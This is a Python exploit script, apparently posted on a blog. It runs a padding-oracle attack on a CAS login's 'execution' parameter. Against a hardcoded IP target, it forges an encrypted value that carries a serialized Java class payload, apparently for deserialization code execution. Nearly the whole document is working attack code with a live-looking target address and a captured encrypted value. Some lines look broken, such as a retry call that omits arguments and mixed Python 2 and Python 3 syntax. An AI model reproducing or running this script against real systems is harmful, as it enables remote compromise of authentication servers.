1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129
| from paddingoracle import BadPaddingException, PaddingOracle from base64 import b64encode, b64decode import base64
import requests import traceback import socket import time import struct
head = None odata = None isDoneTest = False last_call_time = time.time() def validate(data,r,pad): global last_call_time try: v = r.post(sys.argv[1],data={ "lt":"LT-3-A6PzsYih5yCchDBk3q7leQb02jsQNa-cas01.example.org", "execution":"6b38b1ef-349c-4b43-92c2-85903c2f8a35_" + data, "username":"aaa", "password":"aaa", "_eventId":"submit" },allow_redirects = False); if(v.status_code == 503): print('limit') time.sleep(0.1); return validate(data); if pad is not None: pad.history.append(v) if False: print("delay=",(time.time() - last_call_time)) last_call_time = time.time() return v.status_code == 200; except KeyboardInterrupt as e: raise except: traceback.print_exc() time.sleep(0.5) validate(data,r,pad) class PadBuster(PaddingOracle): def __init__(self, **kwargs): super(PadBuster, self).__init__(**kwargs) self.session = requests.Session() self.wait = kwargs.get('wait', 2.0)
def oracle(self, data, **kwargs): global head,isDoneTest,odata raw_orig = odata send_data = head + raw_orig + data send_data = b64encode(send_data) if not isDoneTest: isDoneTest = True test_data = b64encode(head + odata) assert validate(test_data,self.session,None); print("validate true") result = validate(send_data,self.session,self) if result: logging.info('No padding exception raised on %r:%r', time.time(),len(send_data)) logging.info(str(send_data)) return
raise BadPaddingException
def unpack_data(data): mByteArray = base64.b64decode(data.encode()) mHeaderLength = struct.unpack(">i",mByteArray[0:4])[0] print("header length=",mHeaderLength) mNonceLength = struct.unpack(">i",mByteArray[4:8])[0] print("nonce length=",mNonceLength) mNonce = mByteArray[8:8+mNonceLength] print("nonce =",",".join(str(ord(i)) for i in mNonce)) mKeyNameLength = struct.unpack(">i",mByteArray[8+mNonceLength:8+mNonceLength+4])[0] print("keyname length=",mKeyNameLength) mKeyName = mByteArray[8+mNonceLength+4:8+mNonceLength+4+mKeyNameLength] print("keyname=",mKeyName) mData = mByteArray[mHeaderLength:] print("data length=",len(mData)); print("data length% 16=",(len(mData)) % 16); mData = bytearray(mData); return (mNonce,mKeyName,mData,mByteArray[0:mHeaderLength])
if __name__ == '__main__': import logging import sys
if not sys.argv[3:]: print 'Usage: %s <url> <somecookie value> <payload>' % (sys.argv[0], ) sys.exit(1) sys.argv[1] = "http://120.24.35.104:8080/login?service=http%3A%2F%2F120.24.35.104%3A8888%2F" sys.argv[2] = "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" logging.basicConfig(level=logging.DEBUG) logging.getLogger("urllib3").setLevel(logging.WARNING) encrypted_cookie = b64decode(sys.argv[2])
padbuster = PadBuster() payload = open("payloadg.class","rb").read() print("read server cookie") info = unpack_data(sys.argv[2]) head = info[3] odata = info[2] enc = padbuster.encrypt(plaintext=payload, block_size=16,iv=info[0]) head = head[:8] + enc[0:16] + head[16+8:] result = head + enc[16:] print('cookies:') print(b64encode(result))
|
由于Valine存在安全问题,我们不会记录您的IP地址。您所填入的内容,和您的User-Agent信息将明文公开存储。